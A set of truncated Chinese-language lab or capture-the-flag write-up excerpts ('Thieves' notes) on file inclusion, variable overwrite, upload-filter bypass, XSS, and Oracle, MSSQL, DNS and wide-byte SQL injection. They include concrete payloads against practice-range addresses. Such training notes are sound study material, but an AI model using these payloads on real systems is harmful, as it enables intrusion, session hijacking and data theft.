Thieves 本地包含与远程包含漏洞 解题笔记
首先登陆网页http://120.203.13.75:8123/lfi/phpmyadmin/用户名test密码test登陆后台创建一个表aaa,字段名为一句话这里使用GET方便传参然后审计代码发现http://120.203.13.75:8123/lfi/phpmyadmin/index.php?target=db_sql.php%253f/../../../../MySQL/data/test
Thieves 变量覆盖 结题笔记
http://120.203.13.75:8123/abc/upload首先登陆网页,打开登陆界面路径admin然后我们审计代码发现http://120.203.13.75:8123/abc/upload/interface/comment.php页面存在变量覆盖漏洞,构造语句_SESSION[duomi_group_id]=1&_SESSION[duomi_admin_id]=1&
Thieves 文件上传大闯关 解题笔记
第一题 前端验证绕过使用burp抓包绕过foword上传成功第二题 Content-Type方式绕过首先生成一个图片马然后上传,使用burp抓包修改文件名 上传成功第三题 黑名单绕过过滤了php所以可以用php3,php4,php5,phtml来绕过将后缀改为phtml直接上传上传成功第四题 .htaccess文件绕过htaccess是分布式配置文件如果开启,可以是用
Thieves DOM XSS 解题笔记
首先打开靶场http://120.203.13.75:6815/3/然后发现与url相同,试试能不能插入xss首先查看元素,发现是<script>标签先闭合前面的标签,然后写入一个弹框120.203.13.75:6815/3/?</script><script>alert`thieves`</script>也可以使用unicode编码,因为docum
Thieves 存储型XSS 解题笔记
首先进入网页http://117.41.229.122:8082/发现cms和版本号,去百度一下发现大佬的文章,照着试一下首先让页面报错http://117.41.229.122:8082/index.php?c=main&m=test在最后加上xss语句<img src=a onerror=alert(1)>http://117.41.229.122:8082/index.p
Thieves 反射型XSS 解题笔记
首先打开网页http://117.41.229.122:8002/xss/index.php看见一个搜索框先插入123456测试发现两个输出点(注意查看源代码)首先输入<script>alert`123`</script>进行测试发现第一个输出点被转义了,并且在<h2>标签下,基本没辙而第二个没有被转义,但并没有弹窗发现语句在input标签的内部接着尝试使用&q
Thieves Oracle注入-报错注入 解题笔记
打开靶场,首先输入id=1 正常id=1' 报错id=1'-- 正常说明存在注入点输入?id=1' and 1 =ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1))--查看数据库版本,发现是Oracle 11g找到了版本说明存着报错点,接下来就是显错注入了先查表?id=1'
Thieves MSSQL显错注入&反弹注入 解题笔记
显错注入首先进入网页http://120.203.13.75:8150/MSSQL/?id=2先'测试http://120.203.13.75:8150/MSSQL/?id=2'发现报错然后测试注入http://120.203.13.75:8150/MSSQL/?id=2' --+可能存在注入测试一下是mssql数据库http://120.203.13.75:8150/MS
Thieves DNS注入 解题笔记
首先进入网站120.203.13.75:8120/index3.php在后面输入id=1 and 1=1来传参发现网页设置有安全狗,在目标地址后面加上安全狗信任的文件格式,来绕过安全狗/1.txt?id=1 and 1=1由于盲注非常的麻烦,所以这里用到DNS注入注册一个ceyehttp://120.203.13.75:8120/index3.php/1.txt?id=1 and if((SELE
Thieves 宽字节注入 解题笔记
首先打开网页```http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/```输入?id=1 and 1=1发现需要注释,于是输入```http://120.203.13.75:8150/New/WidecharBased/RankOne/sql-one/?id=1%27%20and%201=1%23```由于网页使用了addsla